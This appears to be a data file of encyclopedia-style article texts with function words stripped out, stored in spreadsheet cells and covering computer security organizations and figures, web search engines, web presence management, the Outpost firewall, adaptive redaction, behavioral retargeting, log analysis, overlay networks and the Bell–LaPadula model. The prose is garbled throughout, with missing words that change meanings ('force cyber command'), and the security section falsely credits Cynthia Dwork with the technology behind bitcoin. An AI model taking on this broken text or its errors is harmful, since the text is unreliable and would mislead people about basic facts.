hacking: exploitation inner circle underground books cryptography books cryptography cyber security community cyber security communities cyber security community computer security organizations academic cerias center research education information security computing communication infrastructures located purdue university. cert coordination center program carnegie-mellon university develops advanced methods technologies counter large-scale, sophisticated cyber threats partnership academic programs government enforcement agencies. cert knowledgebase compiles information information security incidents. georgia tech information security center department georgia tech deals information security issues cryptography, network security, trusted computing, software reliability, privacy, internet governance. oulu university secure programming group studies, evaluates develops methods implementing testing application system software order prevent, discover eliminate implementation level security vulnerabilities pro-active fashion. focus implementation level security issues software security testing. commercial australian information security association also known aisa paid members branches located throughout australia monitor condition information security. microsoft digital crimes unit microsoft sponsored team international legal technical experts stop interfere cyber crime cyber threats. government agencies arnes academic research network slovenia, responsible development, operation management communication information network education research. includes si-cert, slovenian computer emergency response team. canadian cyber incident response centre also known ccirc, canadian government program ministry public safety. program monitors threats, coordinates national responses, protects national critical infrastructure cyber incidents. norwegian cyber defence force branch norwegian armed forces responsible military communications offensive defensive cyberwarfare norway. enforcement agencies internet police police secret police departments enforcement agencies charge policing internet. major purposes internet police, depending state, fighting cybercrime, well censorship, propaganda, monitoring manipulating online public opinion. force cyber command (provisional) proposed u.s. force command existed provisional status. october 2008, force's cyberspace mission transferred uscybercom. department defense cyber crime center also known dc3, united states department defense agency provides digital forensics support enforcement agencies. dc3's main focus criminal, counterintelligence, counterterrorism, fraud investigations. criminal, cyber, response, services branch also known ccrsb, service within federal bureau investigation responsible investigating certain crimes including computer-based crime related counterterrorism, counterintelligence, criminal threats united states. cyber division federal bureau investigation division heads national effort investigate prosecute internet crimes, including "cyber based terrorism, espionage, computer intrusions, major cyber fraud." this division uses information gathers investigation inform public current trends cyber crime. focuses around three main priorities: computer intrusion, identity theft, cyber fraud. created 2002. fbi's ability address national security cyber intrusion threat, (pdf archived 2013-03-11 wayback machine)&lt;/ref&gt; national security agency united states bureau responsible national cybersecurity military communications protection. us-cert also known united states computer emergency readiness team, organization within department homeland security's (dhs) national protection programs directorate (nppd); branch office cybersecurity communications' (cs&amp;c) national cybersecurity communications integration center (nccic). us-cert responsible analyzing reducing cyber threats, vulnerabilities, disseminating cyber threat warning information, coordinating incident response activities. uscybercom armed forces sub-unified command subordinate united states strategic command. unit centralizes command cyberspace operations, organizes existing cyber resources synchronizes defense u.s. military networks. independent non-profits australian information security association organisation individuals rather companies aims maintain unbiased view information security australia. hosts conferences annually. information card foundation created equifax, google, microsoft, novell, oracle corporation, paypal others, promote information card approach. information cards personal digital identities people online, component identity metasystems. information systems security association international computer security association internet watch foundation owasp independent web-sites attrition information security-related website, updated least weekly all-volunteer staff. "errata" section devoted pointing inaccuracies, omissions, problems mainstream media related computer security hacking. additionally, staff members publish opinion pieces "security rants" pointing problems computer security industry. wiretapped.net persons influential computer security john mcafee founded mcafee associates (later called mcafee, inc.; intel security) 1987, resigned company 1994. conference vegas, nevada august 2014, warned americans smartphones, suggesting apps used clueless consumers read privacy user agreements. phil zimmermann creator pretty good privacy (pgp), widely used email encryption software world. also known work voip encryption protocols, notably zrtp zfone. principal designer cryptographic agreement protocol (the "association model") wireless standard. ross anderson annie anton adam back daniel bernstein stefan brands jean camp lorrie cranor cynthia dwork microsoft research cryptographer. among achievements, responsible technology behind bitcoin. deborah estrin joan feigenbaum goldberg shafi goldwasser lawrence gordon peter gutmann paul kocher monica stanford university computer science professor, director mobisocial computing laboratory, involved programmable open mobile internet 2020 national science foundation. brian lamacchia kevin mitnick bruce schneier dawn song gene spafford moti yung—israeli cryptographer currently google research. also rubber-hose cryptanalysis references external links outline computer security curlie layered defense approach security malay upadhyay (cyberoam), january 2014 arcos sergio. social engineering. sancho rivera. trends cyber security geer (author), november 2013 participating with safety, guide electronic security threats viewpoint civil liberties organisations. licensed free documentation license. article "why information security hard economic perspective" ross anderson information security glossary sans internet critical security controls amit singh: taste computer security 2004 slowdown sight cyber attacks 26.july.2012 today cyber security dictionary cybersecurity: authoritative reports resources, topic congressional research servicewindows securitythe ultimate guide windows securitywindows securitymac securitylinux securitysecurity in-depth linux software: preventing mitigating security bugs (pdf)threat alerts vulnerability tracking listslists advisories product lists known unpatched vulnerabilities secunia vulnerabilities securityfocus, including bugtraq mailing list. list vulnerabilities maintained government</t>
  </si>
  <si>
    <t>Web search engine</t>
  </si>
  <si>
    <t>search engine software system designed carry searches. they search world wide systematic particular information specified textual search query. search results generally presented line results, often referred search engine results pages (serps). information links pages, images, videos, infographics, articles, research papers, types files. some search engines also mine data available databases open directories. unlike directories, maintained human editors, search engines also maintain real-time information running algorithm crawler. internet-based content can't indexed searched search engine falls category deep web. history pre-1990s system locating published information intended overcome ever increasing difficulty locating information ever-growing centralized indices scientific work described 1945 vannevar bush, wrote article atlantic monthly titled think" envisioned libraries research connected annotations unlike modern hyperlinks. link analysis would eventually become crucial component search engines algorithms hyper search pagerank. 1990s: birth search engines first internet search engines predate debut december 1990: whois user search dates back 1982, knowbot information service multi-network user search first implemented 1989. first well documented search engine searched content files, namely files, archie, debuted september 1990.prior september 1993, world wide entirely indexed hand. there list webservers edited berners-lee hosted cern webserver. snapshot list 1992 remains, servers went online central list could longer keep ncsa site, servers announced title "what's new!".the first tool used searching content opposed users) internet archie. name stands "archive" without "v". created alan emtage, computer science student mcgill university montreal, quebec, canada. program downloaded directory listings files located public anonymous (file transfer protocol) sites, creating searchable database file names; however, archie search engine index contents sites since amount data limited could readily searched manually. rise gopher (created 1991 mark mccahill university minnesota) search programs, veronica jughead. like archie, searched file names titles stored gopher index systems. veronica (very easy rodent-oriented net-wide index computerized archives) provided keyword search gopher menu titles entire gopher listings. jughead (jonzy's universal gopher hierarchy excavation display) tool obtaining menu information specific gopher servers. while name search engine "archie search engine" reference archie comic book series, "veronica" "jughead" characters series, thus referencing predecessor. summer 1993, search engine existed web, though numerous specialized catalogues maintained hand. oscar nierstrasz university geneva wrote series perl scripts periodically mirrored pages rewrote standard format. this formed basis w3catalog, web's first primitive search engine, released september 1993.in june 1993, matthew gray, mit, produced probably first robot, perl-based world wide wanderer, used generate index called "wandex". purpose wanderer measure size world wide web, late 1995. web's second search engine aliweb appeared november 1993. aliweb robot, instead depended notified website administrators existence site index file particular format. jumpstation (created december 1993 jonathon fletcher) used robot find pages build index, used form interface query program. thus first resource-discovery tool combine three essential features search engine (crawling, indexing, searching) described below. because limited resources available platform indexing hence searching limited titles headings found pages crawler encountered. first "all text" crawler-based search engines webcrawler, came 1994. unlike predecessors, allowed users search word webpage, become standard major search engines since. also search engine widely known public. also 1994, lycos (which started carnegie mellon university) launched became major commercial endeavor. first popular search engine yahoo! search. first product yahoo!, founded jerry yang david filo january 1994, directory called yahoo! directory. 1995, search function added, allowing users search yahoo! directory. became popular ways people find pages interest, search function operated directory, rather full-text copies pages. soon after, number search engines appeared vied popularity. these included magellan, excite, infoseek, inktomi, northern light, altavista. information seekers could also browse directory instead keyword-based search. 1996, robin developed rankdex site-scoring algorithm search engines results page ranking received patent technology. first search engine used hyperlinks measure quality websites indexing, predating similar algorithm patent filed google years later 1998. larry page referenced li's work u.s. patents pagerank. later used rankdex technology baidu search engine, founded robin china launched 2000. 1996, netscape looking give single search engine exclusive deal featured search engine netscape's browser. there much interest instead netscape struck deals five major search engines: million year, search engine would rotation netscape search engine page. five engines yahoo!, magellan, lycos, infoseek, excite.google adopted idea selling search terms 1998, small search engine company named goto.com. this move significant effect search engine business, went struggling profitable businesses internet.search engines also known brightest stars internet investing frenzy occurred late 1990s. several companies entered market spectacularly, receiving record gains initial public offerings. some taken public search engine, marketing enterprise-only editions, northern light. many search engine companies caught dot-com bubble, speculation-driven market boom peaked march 2000. 2000s–present: post dot-com bubble around 2000, google's search engine rose prominence. company achieved better results many searches algorithm called pagerank, explained paper anatomy search engine written sergey brin larry page, later founders google. this iterative algorithm ranks pages based number pagerank sites pages link there, premise good desirable pages linked others. larry page's patent pagerank cites robin li's earlier rankdex patent influence. google also maintained minimalist interface search engine. contrast, many competitors embedded search engine portal. fact, google search engine became popular spoof engines emerged mystery seeker. 2000, yahoo! providing search services based inktomi's search engine. yahoo! acquired inktomi 2002, overture (which owned alltheweb altavista) 2003. yahoo! switched google's search engine 2004, launched search engine based combined technologies acquisitions. microsoft first launched search fall 1998 using search results inktomi. early 1999 site began display listings looksmart, blended results inktomi. short time 1999, search used results altavista instead. 2004, microsoft began transition search technology, powered crawler (called msnbot). microsoft's rebranded search engine, bing, launched june 2009. july 2009, yahoo! microsoft finalized deal yahoo! search would powered microsoft bing technology. 2019, active search engine crawlers include google, petal, sogou, baidu, bing, gigablast, mojeek, duckduckgo yandex. approach search engine maintains following processes near real time: crawling indexing searchingweb search engines information crawling site site. "spider" checks standard filename robots.txt, addressed robots.txt file contains directives search spiders, telling pages crawl pages crawl. after checking robots.txt either finding not, spider sends certain information back indexed depending many factors, titles, page content, javascript, cascading style sheets (css), headings, metadata html meta tags. after certain number pages crawled, amount data indexed, time spent website, spider stops crawling moves "[n]o crawler actually crawl entire reachable web. infinite websites, spider traps, spam, exigencies real web, crawlers instead apply crawl policy determine crawling site deemed sufficient. some websites crawled exhaustively, others crawled partially".indexing means associating words definable tokens found pages domain names html-based fields. associations made public database, made available search queries. query user single word, multiple words sentence. index helps find information relating query quickly possible. some techniques indexing, caching trade secrets, whereas crawling straightforward process visiting sites systematic basis. between visits spider, cached version page (some content needed render stored search engine working memory quickly sent inquirer. visit overdue, search engine proxy instead. case, page differ search terms indexed. cached page holds appearance version whose words previously indexed, cached version page useful website actual page lost, problem also considered mild form linkrot. typically user enters query search engine keywords. index already names sites containing keywords, instantly obtained index. real processing load generating pages search results list: every page entire list must weighted according information indexes. then search result item requires lookup, reconstruction, markup snippets showing context keywords matched. these part processing search results page requires, pages (next top) require post-processing. beyond simple keyword lookups, search engines offer gui- command-driven operators search parameters refine search results. these provide necessary controls user engaged feedback loop users create filtering weighting refining search results, given initial pages first search results. example, 2007 google.com search engine allowed filter date clicking "show search tools" leftmost column initial search results page, selecting desired date range. it's also possible weight date page modification time. most search engines support boolean operators and, help users refine search query. boolean operators literal searches allow user refine extend terms search. engine looks words phrases exactly entered. some search engines provide advanced feature called proximity search, allows users define distance keywords. there also concept-based searching research involves using statistical analysis pages containing words phrases search for. usefulness search engine depends relevance result gives back. while millions pages include particular word phrase, pages relevant, popular, authoritative others. most search engines employ methods rank results provide "best" results first. search engine decides pages best matches, order results shown varies widely engine another. methods also change time internet usage changes techniques evolve. there main types search engine evolved: system predefined hierarchically ordered keywords humans programmed extensively. system generates "inverted index" analyzing texts locates. this first form relies much heavily computer bulk work. most search engines commercial ventures supported advertising revenue thus allow advertisers listings ranked higher search results fee. search engines accept money search results make money running search related alongside regular search engine results. search engines make money every time someone clicks ads. local search local search process optimizes efforts local businesses. they focus change make sure searches consistent. it's important many people determine plan based searches. market share january 2022, google world's used search engine, market share 92.01%, world's used search engines bing, yahoo!, baidu, yandex, duckduckgo. russia east asia russia, yandex market share 61.9%, compared google's 28.3%. china, baidu popular search engine. south korea's homegrown search portal, naver, used online searches country. yahoo! japan yahoo! taiwan popular avenues internet searches japan taiwan, respectively. china countries google three search engines market share. google previously search engine china, withdrew disagreement government censorship, cyberattack. europe most countries' markets european union dominated google, except czech republic, seznam strong competitor.the search engine qwant based paris, france, attracts million monthly registered users from. search engine bias although search engines programmed rank websites based combination popularity relevancy, empirical studies indicate various political, economic, social biases information provide underlying assumptions technology. these biases direct result economic commercial processes (e.g., companies advertise search engine become also popular organic search results), political processes (e.g., removal search results comply local laws). example, google surface certain neo-nazi websites france germany, holocaust denial illegal. biases also result social processes, search engine algorithms frequently designed exclude non-normative viewpoints favor "popular" results. indexing algorithms major search engines skew towards coverage u.s.-based sites, rather websites non-u.s. countries.google bombing example attempt manipulate search results political, social commercial reasons. several scholars studied cultural changes triggered search engines, representation certain controversial topics results, terrorism ireland, climate change denial, conspiracy theories. customized results filter bubbles many search engines google bing provide customized results based user's activity history. this leads effect called filter bubble. term describes phenomenon websites algorithms selectively guess information user would like see, based information user (such location, past click behaviour search history). result, websites tend show information agrees user's past viewpoint. this puts user state intellectual isolation without contrary information. prime examples google's personalized search results facebook's personalized news stream. according pariser, coined term, users less exposure conflicting viewpoints isolated intellectually informational bubble. pariser related example user searched google "bp" investment news british petroleum another searcher information deepwater horizon spill search results pages "strikingly different". bubble effect negative implications civic discourse, according pariser. since problem identified, competing search engines emerged seek avoid problem tracking "bubbling" users, duckduckgo. other scholars share pariser's view, finding evidence support thesis unconvincing. religious search engines global growth internet electronic media arab muslim world last decade encouraged islamic adherents middle east asian sub-continent, attempt search engines, filtered search portals would enable users perform safe searches. more usual safe search filters, islamic portals categorizing websites either "halal" "haram", based interpretation "law islam". imhalal came online september 2011. halalgoogling came online july 2013. these haram filters collections google bing (and others).while lack investment slow pace technologies muslim world hindered progress thwarted success islamic search engine, targeting main consumers islamic adherents, projects like muxlim, muslim lifestyle site, receive millions dollars investors like rite internet ventures, also faltered. other religion-oriented search engines jewogle, jewish version google, seekfind.org, christian. seekfind filters sites attack degrade faith. search engine submission search engine submission process webmaster submits website directly search engine. while search engine submission sometimes presented promote website, generally necessary major search engines crawlers eventually find sites internet without assistance. they either submit page time, submit entire site using sitemap, normally necessary submit home page site search engines able crawl well designed website. there remaining reasons submit site page search engine: entirely site without waiting search engine discover site's record updated substantial redesign. some search engine submission software submits websites multiple search engines, also adds links websites pages. this could appear helpful increasing website's ranking, external links important factors determining website's ranking. however, john mueller google stated "can lead tremendous number unnatural links site" negative impact site ranking. also references further reading steve lawrence; giles (1999). "accessibility information web". nature. (6740): 107–9. bibcode:1999natur.400..107l. doi:10.1038/21987. pmid 10428673. s2cid 4347646.{{cite journal}}: maint: multiple names: authors list (link) bing (2007), data mining: exploring hyperlinks, contents usage data. springer,isbn 3-540-37881-2 bar-ilan, (2004). search engines information science research. arist, 231–288. levene, mark (2005). introduction search engines navigation. pearson. hock, randolph (2007). extreme searcher's handbook.isbn 978-0-910965-76-7 javed mostafa (february 2005). "seeking better searches". scientific american. (2): 66–73. bibcode:2005sciam.292b..66m. doi:10.1038/scientificamerican0205-66. ross, nancy; wolfram, dietmar (2000). "end user searching internet: analysis term pair topics submitted excite search engine". journal american society information science. (10): 949–958. doi:10.1002/1097-4571(2000)51:10&lt;949::aid-asi70&gt;3.0.co;2-5. xie, (1998). "quality dimensions internet search engines". journal information science. (5): 365–372. doi:10.1177/016555159802400509. s2cid 34686531. information retrieval: implementing evaluating search engines. press. 2010. external links search engines curlie</t>
  </si>
  <si>
    <t>Web presence</t>
  </si>
  <si>
    <t>presence location world wide person, business, entity represented (see also property point presence). examples presence person could personal website, blog, profile page, wiki page, social media point presence (e.g. linkedin profile, facebook account, twitter account). examples presence business entity could corporate website, microsite, page review site, wiki page, social media point presence (e.g., linkedin company page and/or group, facebook business/brand/product page, twitter account). every presence associated unique address distinguish point presence another. owned unowned presence either owned unowned. owned media exists single person group control content published presence (e.g. corporate website personal twitter account). however, single person group cannot solely control content, creator different owner. this considered unowned media (see earned media). wikipedia yelp page person, company, product would example known "earned") presence. occasionally, first form media known "paid media" often included discussion media types: "earned owned paid". paid media commonly found form advertisements, considered form presence. management presence management process establishing maintaining digital footprint web. three factors considered include following: person business presence; presence represents enterprise; published point presence. presence management discipline determining governing: distribution policy documents platforms appropriate (e.g. internal external blog, youtube vimeo) single inventory personal corporate presence (e.g. partners advocates) business relatable assets represented business relatable assets impersonated pirated properties particular entities represent control properties properties personal corporate inventory (e.g. someone creates presence) authorized unauthorized changes creation (e.g. branding) presence workflow creating property follows corporate standards management system purpose presence management system manage presence person business. this includes collection domain names, websites, social media, pages she, represented. tool generally offers following functions: presence discovery, inventory management, change detection, access control, stakeholder coordination, compliance workflow. presence management system meant broader reach emphasizes presence established, established, must maintained, must remediated. example presence management system brandle presence manager.in order publish content various points presence, multiple content management systems sometimes even social media management systems often used. primary focus content social media management systems limited specific platforms. domain names another aspect presence management managing collection domain names registered person business. entity register multiple domain names property. result, link alternative spellings, different top-level domains, aliases, brands, products website. similarly, negative derogatory domain names also registered. this done prevent certain domain names used person business. common larger business domain names registered multiple employees multiple domain name registrars, possibly result organizational geographical requirements. consequently, presence management system used monitor domain names registered business, regardless registrars used. discovery presence discovery process monitoring point presence person business. presence discovery often included presence management system. whether domain registered, website published, social media account established, occurs outside person's business’ control. result, purpose assess point presence appropriately handle violations. important note presence discovery differs content listening. former involves looking properties web, whereas latter refers analyzing content already exists hear person business seen often near real time. examples content listening systems include sysomos radian6, subsidiary salesforce.com. brand protection person business choose watch presence might appear misrepresent mislead audience, counterfeiters, spoofers, malicious hackers. early software online brand protection marketplace markmonitor, part thomson reuters. this software helped detect rogue domain names websites. however, modern growth social media seen rise number fraudulent brand impersonations. become much easier presence created platforms, results greater frequency today. preventive measure, online brand protection providers adding social media domain website discovery options. security widespread growth social media also made easier unauthorized individuals impersonate employee. consequently, social media become recognized threat vector used socially engineer attack business. counter this, companies able presence monitoring tools detect points presence thereby defend socially engineered attacks. distributed inventory management presence monitoring system used business associate property corporate inventory. designed address autonomous, distributed behaviors. this usually applies larger businesses whose geographically diverse employees prone creating points presence web. example, retail chain allow local store create manage presence market communicate local customer base. similarly, global business teams country region create manage presence adapt local languages cultures. monitoring presence monitoring process monitoring known inventory presence detect changes made. presence monitoring often included presence management system serve multiple purposes larger corporations certain individuals, celebrities. important note presence monitoring differs content listening. former involves monitoring properties (e.g. branding) property established inventory, whereas latter refers analyzing content already exists hear person business seen often near real time. additionally, presence monitoring focuses owned media content listening earned media. corporate, brand, regulatory compliance many companies ensure certain standards property represents business. companies regulated industries, finance healthcare, company required ensure publicized content, regardless platform technology, follow specific requirements.the widespread growth social media seen rise number fraudulent corporate impersonations. become much easier presence created platforms, much prevalent used preventive measure, presence monitoring system alerts company known property changed, allowing property reviewed amended follows proper standards. presence monitoring system helps alert company known property changed, reviewed brought back, necessary, compliance appropriate standards. audit presence audit performed enterprise determine points presence meet objectives well governance, risk management, compliance (grc) needs. ensure neutrality, audits often conducted part information technology audit professional services agency internal audit team. however, less formal presence audit often performed internal members routine meet objectives. presence audit usually includes presence discovery review web-based content business’ inventory presence. even though presence monitoring performed presence audit, review nature scope company's presence monitoring policies, procedures, tools considered. social media audit emerging challenges introduced dynamic nature social media, business choose perform specific social media audits greater frequency. social media audit similar presence audit, also include purposes maintaining accurate inventory business social media points presence. alternatively, business choose employ automated presence discovery compliance systems keep corporate social media inventory up-to-date compliant needs. presence reputation management reputation management systems often associated presence management. presence management knowing individual business represented, whereas reputation management knowing people saying individual business. presence management handles owned media, reputation management systems earned media. both systems offer similar degree remediation. presence management systems, remediation would include finding counterfeit properties infringe brand trademark. reputation management systems, remediation would include identifying eliminating misleading reviews and/or encouraging contribution authentic comments. even though presence monitoring tool help identify unowned properties people talking person, product, brand, part solution. reputation management system often includes content listening system monitor stream messages particular subject coming point presence (e.g. comment product customer personal twitter account). examples reputation management companies, click here. also references</t>
  </si>
  <si>
    <t>Outpost Firewall Pro</t>
  </si>
  <si>
    <t>outpost firewall discontinued personal firewall developed agnitum (founded 1999 petersburg, russia). overview outpost firewall monitors incoming outgoing network traffic windows machines. outpost also monitors application behavior attempt stop malicious software covertly infecting windows systems. agnitum called technology "component control" "anti-leak control" (included hips-based "host protection" module). product also includes spyware scanner monitor, along pop-up blocker spyware filter internet explorer mozilla firefox. (outpost's surfing security tools included black-lists urls, unwanted page element filters ad-blocking. technology altogether known "web control".) version adds techniques help users block unknown threats activation: removable media protection (so-called "usb virus protection", part proactive protection module) blocks unsigned programs automatically upon connection removable media. smartdecision technology (so-called "personal virus adviser", basis proactive protection module) facilitates decision-making process.version introduces improvements well windows compatibility redesigned user interface; version also extends host-based intrusion-prevention system (hips) support. outpost firewall allows user specifically define application connects internet. this known "rules wizard" mode, policy, default behavior program. mode, outpost firewall displays prompt time process attempts network access process requests connection covered pre-validated rules. idea user decide whether application allowed network connection specific address, port protocol. outpost firewall includes pre-set rules many popular applications. users could optionally submit rules created. first versions outpost firewall (1.0–4.0) allow users create plugins third-party plugins meet specific needs. later versions plugin programming interface. online assistance outpost firewall users developed unofficial forum agnitum since 2002 discuss product features support. forum moderated experienced senior users outpost firewall offers help support technical advice program assistance. achievements outpost firewall pro's self-protection technology aims detecting attempts modify disable services hinder program protection, received accolades comparison testers capable sophisticated detecting known methods disabling without user permission. testing site matousec.com (performing test-set leak-tests known software including firewalls), consistently gives outpost firewall highest ratings firewalls independent comparisons. outpost firewall awards countries computer media test labs since 2002.the product also licensed several security software publishers 2003–2010: sophos (uk, usa), lavasoft (sweden), canon (japan), bullguard (uk), cat-quickheal (india), novell (usa), (czech republic), avast (czech republic), proland software (india), others. editions outpost firewall pro: shareware personal firewall inbound-outbound program actions control port stealthing plus anti-spyware surfing security plus hips engine. outpost firewall free: freeware version includes local firewall access control port stealthing, plus hips engine. outpost security suite pro: includes personal firewall, anti-virus, anti-spam, surfing security tools hips. anti-spam dropped version onwards duplicates functions built popular mail clients thus redundant. outpost security suite free: free limited edition internet security suite features firewall, anti-virus, anti-spyware, anti-spam host intrusion prevention system hips). criticism outpost generate large number security alerts, experts believe lead inexperienced end-user habitually dismissing alerts, even important ones. this firewall preferred experienced users agnitum's direction give user complete control aspects system avoid unwanted changes malicious software, disclosure personal information malware. advanced security mode, outpost's component control notify user every time network enabled application changed component anti-leak control notify user whenever application performs potentially dangerous operation overwriting another application's memory space. practice result high number alerts quickly become intrusive. mediate this, outpost includes option apply validated pre-sets automatically, allow secure configuration, provide ease use. discontinuation december 2015, yandex acquired agnitum order technology yandex browser. valid license holders given january 2016 exchange license keys year license kaspersky internet security. also comparison antivirus software comparison firewalls references footnotes (website review user ratings) bullguard license agreement, saying firewall based outpost sophos outpost firewall technology agnitum novell client firewall based outpost agnitum external links flash video demonstrating outpost firewall alerts windows vista machine</t>
  </si>
  <si>
    <t>Adaptive Redaction</t>
  </si>
  <si>
    <t>adaptive redaction alternate version redaction whereby sensitive parts document automatically removed based policy. primarily used next generation data loss prevention (dlp) solutions. content context policy rules based content context. context include: sending uploading) information. receiving information (including site uploading downloading). communication channel (e.g. email, web, copy removable media).the content 'visible' information, screen. also 'invisible' information document properties revision history, also 'active' content embedded electronic document, macro. purpose adaptive redaction designed alleviate "false positive" events created data loss prevention software (dlp) security solutions. false positives occur policy triggers prevents legitimate outgoing communication. majority cases caused oversight sender. examples sending unprotected credit card information outside organisation breaches payment card industry data security standard (pci regulations). many organisations accept credit card information email, however reply email containing information would send prohibited information. this would cause breach policy. adaptive redaction used remove credit card number allow email sent. 'invisible' information found documents created embarrassment several governments. also data masking redaction tokenization (data security) references</t>
  </si>
  <si>
    <t>Behavioral retargeting</t>
  </si>
  <si>
    <t>behavioral retargeting (also known behavioral remarketing, simply, retargeting) form online targeted advertising online advertising targeted consumers based previous internet behaviour. retargeting tags online users including pixel within target webpage email, sets cookie user's browser. once cookie set, advertiser able show (often display ads) user elsewhere internet exchange. dynamic creative (also known personalized retargeting), allows advertiser display banner created on-the-fly particular consumer based specific pages viewed. example, consumer visits advertiser's website browses products retargeted display banner featuring exact products previously viewed. this typically restricted visitor's browsing single website. refined version improves re-engagement customers. customer begins online order, example, fails complete flag indicates interest product ordered. later, showing product interest custom-linked point back order system. when user clicks returned incomplete order. types while retargeting depends setting cookies user's browser, several different methods this: site retargeting search retargeting link retargeting email retargeting social retargeting pricing retargeting campaigns usually lower cost media, display ads, increases effectiveness specifically targeting interested audience, also improves overall advertiser. common use-case retargeting situations website visitor's actions result sale conversion.retargeting providers employ variety pricing models charge advertisers viewed consumers. three prominent models include: (cost mille cost thousand) (cost click) (cost action)cost impression (cpm) common metric used online advertising industry charge advertisers inventory based price thousand-page impressions. impression defined time banner loads individual's browser. click (ppc) charges advertisers every verifiable click leads consumers back retailer's website. unlike model, charges advertisers flat rate, advertisers working model charged person clicks cost action (cpa) pricing model advertisers charged based pre-arranged action purchase, view through, etc.), although completed sale common action used model. concerns united states, several organizations, including federal trade commission, congress media, expressed privacy concerns around practice retargeting; however, responsible personalized retargeting providers collect personally identifiable information (pii) consumers. providers blind user's age, personal information. instead, providers rely upon data gathered cookies placed consumer's browser websites visit. this information shared among publishers, advertisers third parties cannot linked specific user. united states legislated many laws around practice, instead relies upon industry overarching organizations, interactive advertising bureau, network advertising initiative truste self-regulate. october 2010, announced advertising option icon, partner sites place near banner advertisements collect non-pii user data.in 2002 eprivacy directive 2009 revision require opt-in consent cookies stipulate users must given option opting out. also behavioral targeting link retargeting site retargeting references</t>
  </si>
  <si>
    <t>Web log analysis software</t>
  </si>
  <si>
    <t>analysis software (also called analyzer) kind analytics software parses server file server, based values contained file, derives indicators when, how, server visited. reports usually generated immediately, data extracted files alternatively stored database, allowing various reports generated demand. features supported analysis packages include "hit filters", pattern matching examine selected data. common indicators number visits number unique visitors visit duration last visits authenticated users, last authenticated visits days week rush hours domains/countries host's visitors. hosts list number page views most viewed, entry, exit pages file types used browsers used robots used http referrer search engines, phrases keywords used find analyzed site http errors some analyzers also report site, conversion tracking, visit time page navigation. also list analytics software external links analysis analysis software curlie</t>
  </si>
  <si>
    <t>Overlay network</t>
  </si>
  <si>
    <t>overlay network computer network layered another network. structure nodes overlay network thought connected virtual logical links, corresponds path, perhaps many physical links, underlying network. example, distributed systems peer-to-peer networks client–server applications overlay networks nodes internet.the internet originally built overlay upon telephone network, today (through advent voip), telephone network increasingly turning overlay network built internet. uses enterprise networks enterprise private networks first overlaid telecommunication networks frame relay asynchronous transfer mode packet switching infrastructures migration (now legacy) infrastructures based mpls networks virtual private networks started (2001~2002). from physical standpoint, overlay networks quite complex (see figure combine various logical layers operated built various entities (businesses, universities, government etc.) allow separation concerns time permitted buildup broad services could proposed single telecommunication operator (ranging broadband internet access, voice iptv, competitive telecom operators etc.). internet telecommunication transport networks networks (which combined make broader internet) overlaid least optical fiber layer, transport layer circuit switching layers case pstn). over internet nowadays internet basis overlaid networks constructed order permit routing messages destinations specified address. example, distributed hash tables used route messages node specific logical address, whose address known advance. overlay networks also proposed improve internet routing, quality service guarantees achieve higher-quality streaming media. previous proposals intserv, diffserv, multicast seen wide acceptance, largely require modification routers network. hand, overlay network incrementally deployed end-hosts running overlay protocol software, without cooperation isps. overlay control packets routed underlying network overlay nodes, control, example, sequence overlay nodes message traverses reaching destination. example, akamai technologies manages overlay network provides reliable, efficient content delivery kind multicast). academic research includes system multicast overcast, multicasting overlay network; (resilient overlay network) resilient routing; overqos quality service guarantees, among others. internet things dispersed nature internet things (iot) presents major operational challenge uncommon traditional internet enterprise networks. devices managed together fleet railcars physically colocated. instead, widely geographically distributed. operational approaches management security used enterprise networks, hosts densely contained buildings campuses, translate iot. devices operate outside enterprise network security operational perimeter corporate firewall can’t protect them. dispatching technicians expensive, manual provisioning configuration doesn’t scale. devices connect internet variety last-mile isps, many devices won’t share common prefix addresses change arbitrary times. configuration based require continued upkeep often out-of-date, exposing hosts devices external threats. advantages benefits resilience resilient overlay networks (ron) architectures allow distributed internet applications detect recover disconnection interference. current wide area routing protocols take least several minutes recover improved upon application layer overlay. nodes monitor internet paths among determine whether reroute packets directly internet nodes thus optimizing application specific metrics.the resilient overlay network relatively simple conceptual design. nodes deployed various locations internet. these nodes form application layer overlay cooperate routing packets. each nodes monitor quality internet paths uses information accurately automatically select paths packet, thus reducing amount time required recover poor quality service. multicast overlay multicast also known system peer-to-peer multicast. high bandwidth multi-source multicast among widely distributed nodes critical capability wide range applications, including audio video conferencing, multi-party games content distribution. throughout last decade, number research projects explored multicast efficient scalable mechanism support group communication applications. multicast decouples size receiver amount state kept single node potentially avoids redundant communication network. limited deployment multicast, best effort network layer multicast protocol, considerable interest alternate approaches implemented application layer, using end-systems. overlay end-system multicast approach, participating peers organize overlay topology data delivery. each edge topology corresponds unicast path end-systems peers underlying internet. multicast-related functionality implemented peers instead routers, goal multicast protocol construct maintain efficient overlay data transmission. disadvantages slow spreading data. long latency. duplicate packets certain points. list overlay network protocols overlay network protocols based tcp/ip include: http https distributed hash tables (dhts) based chord jxta xmpp: routing messages based endpoint jabber (example: nodeid_or_userid@domainid\resourceid) instead address many peer-to-peer protocols including gnutella, gnutella2, freenet, tor. pucc solipsis: france télécom system massively shared virtual worldoverlay network protocols based udp/ip include: distributed hash tables (dhts) based kademlia algorithm, kad, etc. real time media flow protocol adobe flash also darknet mesh network peercasting virtual private network references external links list overlay network implementations, july 2003 resilient overlay networks overcast: reliable multicasting overlay network overqos: overlay based architecture enhancing internet 3170 multicast tcp/ip howto system multicast</t>
  </si>
  <si>
    <t>Bell–LaPadula model</t>
  </si>
  <si>
    <t>bell–lapadula model (blp) state machine model used enforcing access control government military applications. developed david elliott bell leonard lapadula, subsequent strong guidance roger schell, formalize u.s. department defense (dod) multilevel security (mls) policy. model formal state transition model computer security policy describes access control rules security labels objects clearances subjects. security labels range sensitive (e.g., "top secret"), least sensitive (e.g., "unclassified" "public"). bell–lapadula model example model clear distinction protection security. features bell–lapadula model focuses data confidentiality controlled access classified information, contrast biba integrity model describes rules protection data integrity. formal model, entities information system divided subjects objects. notion "secure state" defined, proven state transition preserves security moving secure state secure state, thereby inductively proving system satisfies security objectives model. bell–lapadula model built concept state machine allowable states computer system. transition state another state defined transition functions. system state defined "secure" permitted access modes subjects objects accordance security policy. determine whether specific access mode allowed, clearance subject compared classification object (more precisely, combination classification compartments, making security level) determine subject authorized specific access mode. clearance/classification scheme expressed terms lattice. model defines discretionary access control (dac) rule mandatory access control (mac) rules three security properties: simple security property states subject given security level read object higher security level. (star) security property states subject given security level write object lower security level. discretionary security property uses access matrix specify discretionary access control.the transfer information high-sensitivity document lower-sensitivity document happen bell–lapadula model concept trusted subjects. trusted subjects restricted star-property. trusted subjects must shown trustworthy regard security policy. bell–lapadula security model directed toward access control characterized phrase 